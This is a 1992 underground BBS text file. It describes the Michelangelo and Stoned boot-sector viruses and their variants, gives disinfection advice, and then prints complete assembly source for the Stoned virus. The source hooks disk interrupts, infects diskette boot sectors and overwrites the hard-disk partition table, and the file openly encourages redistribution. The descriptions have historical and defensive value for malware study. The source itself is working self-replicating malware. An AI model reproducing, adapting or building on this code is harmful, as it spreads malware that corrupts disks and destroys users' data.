><><><><><><><><><><><><><><><><><><><><><><><><><><><><> ********************************************************* * * * The Michelangelo & Stoned Virus * * * * * * Another Modernz Presentation * * * * by * * Digital-demon * * * * (C)opyright March 5th, 1992 * * * ********************************************************* <><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><> ******************************************************************************* The Modernz can be contacted at: MATRIX BBS WOK-NOW! World of Kaos NOW! World of Knowledge NOW! St. Dismis Institute - Sysops: Wintermute Digital-demon (908) 905-6691 (908) WOK-NOW! (908) 458-xxxx 1200/2400/4800/9600 14400/19200/38400 Home of Modernz Text Philez <><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>< <*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*> <><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><> TANSTAAFL The Church of Rodney - Sysop: Tal Meta (908) 830-TANJ (908) 830-8265 Home of TANJ Text Philez <*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*> Syndicate Bbs Sysop: Hegz (908)506-6651 300/1200/2400/4800/9600 14400/19200/38400 Modernz Site TLS HQ <><><><><><><><><><><><><><<><<><><><><><><><><><><><><><><><><><><><><><><><>< The Global Intelligence Center World UASI Headquarters! Pennsylvania SANsite! (412) 475-4969 300/1200/2400/9600 24 Hours! SysOp: The Road Warrior <><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>< The Lost Realm Western PA UASI site! Western PA. SANfranchise (412) 588-5056 300/1200/2400 SysOp: Orion Buster <><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>< The Last Outpost PowerBBS Support Board UASI ALPHA Division NorthWestern PA UASI site! (412) 662-0769 300/1200/2400 24 hours! SysOp: The Almighty Kilroy <><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>< Hellfire BBS SANctuary World Headquarters! New Jersey UASI site! (908) 495-3926 300/1200/2400 24 hours! SysOp: Red <*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*> BlitzKrieg BBS Home of TAP (502)499-8933 <*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*> The Michelangelo virus was first reported in April, 1991 in Sweden and the Netherlands. The first usable sample of this virus was actually received in June, 1991. Michelangelo is a memory resident infector of diskette boot sectors and the hard disk partition table. It is roughly based on the Stoned virus, though very different in its behavior. The Michelangelo virus becomes memory resident the first time the system is attempted to be booted with a Michelangelo infected disk. Regardless of whether this boot is successful, Michelangelo will become memory resident. Total system and available free memory, as measured by the DOS CHKDSK program will typically decrease by 2,048 bytes. Michelangelo will be resident at the top of system memory but below the 640K DOS boundary. Interrupt 12's return will be moved to insure that Michelangelo in memory is not overwritten. Once Michaelangelo is memory resident, it will infect diskette boot sectors as they are accessed. It will also infect the hard disk partition table when the user attempts to access a file on the hard disk. On 360K 5.25" diskettes, the original boot sector will be moved by the virus to sector 11, the last sector in the root directory. On 1.2M 5.25" diskettes, the original boot sector will be relocated to sector 28, part of the root directory. Since the original boot sector now resides in the root directory, any entries which happened to be in the overwritten sector of the root directory will be lost. Partition table infections will result in the original partition table having been moved to Side 0, Cylinder 0, Sector 7 on the hard disk. Michelangelo activates on March 6, at which time it will format the system hard disk by overwriting it with random characters from system memory. ------------------------------------------------------------------------------- The Stoned virus was first reported in Wellington, New Zealand in early 1988. The original virus only infected 360KB 5-1/4" diskettes, doing no overt damage. The original diskette-only infector is extinct, however, and all known variants of this virus are capable of infecting the hard disk partition table as well as may damage directory or FAT information. Most variants of this virus have only minor modifications, usually in what the message is that the virus may display on boot. When a computer system is booted with a Stoned infected disk, this virus will install itself memory resident at the top of system memory. The interrupt 12 return will be moved, and ChkDsk will indicate that the computer system as 2K less total memory than what is installed. If the system boot was from a diskette, the virus will also attempt to infect the hard disk partition table, if it was not previously infected. During the boot process, the Stoned virus may display a message. The message is displayed more or less on a random basis. The most common text for the message is: "Your computer is now stoned." Or: "Your PC is now Stoned!" After Stoned is memory resident, it will infect diskettes as they are accessed on the system. When Stoned infects a diskette, it moves the original boot sector (sector 0) to sector 11. The Stoned virus then copies itself into sector 0. Since sector 11 is normally part of the diskette root directory on 360K 5.25" diskettes, any files which had their directory entries located in this sector will be lost. Some versions of DOS have sector 11 as part of the File Allocation Table, which may also result in the disk's FAT being corrupted. When Stoned infects that system hard disk, it copies the hard disk's original partition table to side 0, cyl 0, sector 7. A copy of the Stoned virus is then placed at side 0, cyl 0, sector 1, the original location of the hard disk partition table. If the hard disk was formatted with software which starts the boot sector, file allocation table, or disk directory on side 0, cyl 0 right after the partition table, the hard disk may be corrupted as well. In order to disinfect a system infected with the Stoned virus, the system must be powered off and booted with an uninfected, write- protected boot diskette. If this is not done, the virus may re-infect diskettes as soon as they are disinfected. There are many programs which can disinfect Stoned infected diskettes and hard disks. To successfully use one of these, follow the instructions with the program. To remove Stoned manually, the DOS SYS command can be used on 5.25" 360K diskettes. On the hard disk, the original partition table must be copied back to side 0, cyl 0, sector 1. This can be performed with Norton Utilities, or other sector editors. Known variant(s) of Stoned are: Deunis : Based on the Stoned virus, Deunis is a variant received from Spain in July, 1991. The text contained within the virus is now: "*Deun*s abras* tu Cpu!" "(c) IMAN4" PS-Stoned: Based on the Stoned virus, PS-Stoned is a variant which has been altered to avoid detection. Unlike most members of the Stoned Family, PS-Stoned does not contain a message, and does not display any message when the system is booted from an infected disk. This variant will infect the boot sector of both normal and high-density diskettes, as well as the hard disk partition table. In the case of the partition table, the original partition table is moved to cylinder 0, side 0, sector 17. On low density diskettes, the original boot sector is moved to sector 11, while on high density diskettes it can be found at sector 16. This variant was originally received in February, 1991, from New Brunswick, Canada after being isolated at a university. As of May, 1991, no anti-viral products detect this variant which can be just about invisible on infected systems. Rostov: Similar to Stoned-B, this variant does not display any message. It contains the text: "Non-system disk" and "Replace and strike". Submitted in December, 1990, origin unknown. Sex Revolution V1.1: Submitted in December, 1990, this variant is similar to Stoned-B. This variant may display the following message: "EXPORT OF SEX REVOLUTION ver. 1.1" Sex Revolution V2.0: Similar to Sex Revolution V1.1, the message has been changed to: "EXPORT OF SEX REVOLUTION ver. 2.0" Stoned-A: Same as Stoned above, but does not infect the system hard This is the original virus and is now extint. The text found in the boot sector of the infected diskettes is: "Your computer is now stoned. Legalize Marijuana". The "Legalize Marijuana" portion of the text is not displayed. Stoned-B: Same as Stoned indicated above. Systems with RLL controllers may experience frequent system hangs. Text typically found in this variant is: "Your computer is now stoned. Legalise Marijuana". The "Legalise Marijuana" may also be in capital letters, or may be partially overwritten. It is not displayed. Stoned-C: same as Stoned, except that the message has been removed. Stoned-D: same as Stoned, with the exception that this variant can infect high density 3.5" and 5.25" diskettes. Stoned-E: Similar to Stoned-B, this variant now emits a "beep" Stoned-E: Similar to Stoned-B, this variant now emits a "beep" through the system speaker when the following message is displayed: "Your PC is now Stoned!" The Text "LEGALISE MARIJUANA!" can also be found in the boot sector and system partition table. Stoned-F: Similar to Stoned-E, this variant also emits a "beep" through the system speaker when its message is displayed. The displayed message is: "Twoj PC jest teraz be!" The text "LEGALISE MARIJUANA?" can also be found in the boot sector and the partition table. Stoned II: Based on Stoned-B, this variant has been modified to avoid detection by anti-viral utilities. Since its isolation in June, 1990, most utilities can now detect this variant. Text in the virus has been changed to: "Your PC is now Stoned! Version 2" Or: "Donald Duck is a lie." The "Version 2" of the text may be corrupted as well. ------------------------------------------------------------------------------- The "New Zealand Virus". Also called - Stoned, Marijuana, San Diego Virus, Smithsonian Virus CODE SEGMENT ASSUME CS:CODE WORK_SPACE EQU 512 MAXIMUM_SIZE EQU 1BEH VIRUS PROC NEAR DB 0EAH ;JMP 07C0:0005 DW 5,7C0H JMP INSTALL ; DRIVE_LETTER INDICATES BOOT DISK, 0 = A:, 2 = C: DRIVE_LETTER DB 0 OLD_13 LABEL DWORD OFFS DW ? SEGM DW ? NEW_ADDRESS LABEL DWORD DW CONTINUE NEW_SEGMENT DW 0 REBOOT LABEL DWORD DW 7C00H,0 NEW_13: PUSH DS PUSH AX CMP AH,2 JC SPINNING CMP AH,4 JNC SPINNING OR DL,DL ; IS IT DRIVE A:? JNZ SPINNING ; JUMP IF NOT XOR AX,AX MOV DS,AX MOV AL,DS:43FH ; IS DRIVE MOTOR SPINNING? TEST AL,1 ; IF YES THEN JUMP JNZ SPINNING ; INT13 REQUEST IS FOR READ OR WRITE TO A: - MOTOR NOT YET STARTED. CALL INFECT ; NOT SPINNING - INFECT SPINNING: POP AX POP DS JMP CS:[OLD_13] INFECT: PUSH BX ; SAVE REGISTERS PUSH CX PUSH DX PUSH ES PUSH SI PUSH DI MOV SI,4 ; MAKE FOUR ATTEMPTS GET_BOOT_SECTOR: MOV AX,201H ; READ SECTOR PUSH CS POP ES MOV BX,OFFSET WORK_SPACE XOR CX,CX ; TRACK 0, SECTOR 0 MOV DX,CX ; HEAD 0, DRIVE 0 INC CX PUSHF CALL CS:[OLD_13] JNC BOOT_IS_DONE ; READ OK. XOR AX,AX ; DRIVE RESET PUSHF CALL CS:[OLD_13] DEC SI ; COUNT NUMBER OF TRIES JNZ GET_BOOT_SECTOR ; LOOP JMP FINISH BOOT_IS_DONE: XOR SI,SI ; CODE SEGMENT START MOV DI,OFFSET WORK_SPACE ; POINTER TO BOOT SECTOR CLD PUSH CS POP DS LODSW CMP AX,DS:[DI] ; OURS? JNZ CREATE_BOOT ; NO, CREATE BOOT LODSW ; RETRY CMP AX,DS:[DI+2] ; OURS? JZ FINISH ; NO, FINISH UP CREATE_BOOT: MOV AX,301H ; WRITE ORIGINAL BOOT SECTOR FROM BUFFER MOV BX,OFFSET WORK_SPACE MOV CL,3 MOV DH,1 PUSHF CALL CS:[OLD_13] ; WRITE JC FINISH MOV AX,301H XOR BX,BX MOV CL,01 XOR DX,DX PUSHF CALL CS:[OLD_13] FINISH: POP DI ; RESTORE REGISTERS POP SI POP ES POP DX POP CX POP BX RET INSTALL: XOR AX,AX MOV DS,AX CLI MOV SS,AX MOV SP,7C00H STI ; ENABLE INTERRUPTS MOV AX,DS:4CH ; SAVE OLD 13H MOV DS:[OFFS+7C00H],AX MOV AX,DS:4EH MOV DS:[SEGM+7C00H],AX MOV AX,DS:413H ; MEMORY AVAILABLE DEC AX DEC AX MOV DS:413H,AX MOV CL,6 SHL AX,CL MOV ES,AX ; ES: = FREE MEMORY ADDRESS MOV DS:[NEW_SEGMENT+7C00H],AX ; PUT IT INTO NEW JUMP VECTOR MOV AX,OFFSET NEW_13 ; INSTALL NEW VIRUS VECTOR MOV DS:4CH,AX MOV DS:4EH,ES MOV CX,OFFSET ENDOFPROGMEM PUSH CS POP DS ; DS POINTS TO OUR CODE SEGMENT XOR SI,SI ; SI POINTS TO 0 MOV DI,SI ; DI POINTS TO 0 CLD ; SET DIRECTION FLAG TO INCREMENT REP MOVSB ; MOVE OURSELVES INTO HIGH MEMORY! JMP NEW_ADDRESS ; THIS JUMP TRANSFERS TO CONTINUE BUT IN HIGH MEM ; THE FOLLOWING CODE IS EXECUTED AFTER BEING MOVED TO HIGH MEMORY ; EXECUTION IS VIA THE JUMP TO NEW_ADDRESS CONTINUE: MOV AX,0 ; RESET DISK SYSTEM INT 13H ; THIS IS THE INFECTED INT 13H XOR AX,AX ; READ REAL BOOT SECTOR MOV ES,AX MOV AX,201H MOV BX,7C00H ; INTO THE BOOT AREA OF RAM CMP DRIVE_LETTER,0 JZ BOOT_A BOOT_C: MOV CX,0002H ; FROM SECTOR 2 TRACK 0 HEAD 0 FOR FIRST HD MOV DX,0080H INT 13H JMP QUITPROG BOOT_A: MOV CX,0003H ; FROM SECTOR 3 TRACK 0 HEAD 1 FOR DRIVE A: MOV DX,0100H INT 13H JC QUITPROG ; FAILED READ! TEST BYTE PTR ES:46CH,7 ; CHECK SYSTEM CLOCK LAST 3 BITS JNZ NOMESSAGE MOV SI,OFFSET MESSAGE ; DS IS POINTING TO 7C0:000 WHICH PUSH CS POP DS MSGLOOP: LODSB ; ALSO HAS THE TEXT OR AL,AL JZ NOMESSAGE MOV AH,14 MOV BH,0 INT 10H JMP MSGLOOP NOMESSAGE: PUSH CS POP ES MOV AX,201H MOV BX,OFFSET WORK_SPACE ; READ BOOT SECTOR FROM HARD DISK MOV CL,1 MOV DX,0080H INT 13H JC QUITPROG ; BAD READ - SO JUMP PUSH CS POP DS MOV SI,OFFSET WORK_SPACE ; SOURCE IS THE BOOT SECTOR MOV DI,0 ; DESTINATION IS OUR OWN CODE LODSW ; MOV AX,DS:[SI] ; ADD SI,2 CMP AX,DS:[DI] ; VIRUS? JNZ SAVEBOOT ; JUMP IF NOT LODSW ; MOV AX,DS:[SI] ; ADD SI,2 CMP AX,DS:[DI+2] ; HAS IT GOT A VIRUS? JNZ SAVEBOOT QUITPROG: MOV DRIVE_LETTER,0 ; YES - SO BOOT DRIVE 0 FOR A> JMP REBOOT ; THIS JUMPS TO 0:7C00H TO CONTINUE BOOT CODE SAVEBOOT: MOV DRIVE_LETTER,2 ; DRIVE 2 FOR C> MOV AX,301H ; GONNA WRITE MOV BX,OFFSET WORK_SPACE ; OLD BOOT SECTOR MOV CX,0007H ; TO SECTOR 7 MOV DX,0080H ; OF DRIVE C> INT 13H JC QUITPROG PUSH CS POP DS PUSH CS POP ES MOV SI,OFFSET WORK_SPACE+MAXIMUM_SIZE MOV DI,MAXIMUM_SIZE MOV CX,400H-MAXIMUM_SIZE REP MOVSB ; SI -> DI AND INC BOTH CX TIMES MOV AX,301H ; GONNA WRITE BOOT SECTOR XOR BX,BX ; FROM TOP OF OUR CODE INC CL ; SECTOR 1 ; MOV DX,0080H ;<-- DX IS LEFT OVER FROM ABOVE INT 13H ; DO IT JMP QUITPROG MESSAGE: DB 7,'Your PC is now Stoned!',7,13,10,10,0 DB 'LEGALISE MARIJUANA!' ; This bit doesn't display! ENDOFPROGMEM: VIRUS ENDP CODE ENDS END VIRUS |-|-|-|-|-|-|=|=|=|=|=|=|=|=|=|=|=|-|-|-|-|-|-|-|-|-|-|-|=|=|=|=|=|=| Disclaimer ~~~~~~~~~~ This publication is for informational purposes ONLY. In no way are the above authors, or organizations, liable for the use or misuse of the information contained herein. The Underground Agent Society Inc., The Agents Underground Notebooks, UASI, UASI Magazine, The Global Intelligence Center, and The Global Intelligence Underground are all unregistered trademarks of UASI. Distribution to EVERYWHERE is ENCOURAGED! Hellfire BBS, SANctuary Magazine, SANphilez, and SANsites are all unregistered trademarks of SANctuary. Matrix BBS, Modernz, and others are unregistered trademarks of Modernz. Distribution of these text files is allowed...and downright encouraged. |-|=|-|=|-|=|-|=|-|=|-|=|-|=|-|=|-|=|-|=|-|=|-|=|-|=|-|=|-|=|-|=|-|=|-|=|-|=|-| <*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*> <*> <*> <*> THIS HAS BEEN A MODERNZ PRESENTATION <*> <*> <*> <*> SEE YOU ALL AT MATRIX BBS (908)905-6691 <*> <*> <*> <*> NON-PURSUITABLE WITHOUT A GLOBAL <*> <*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*>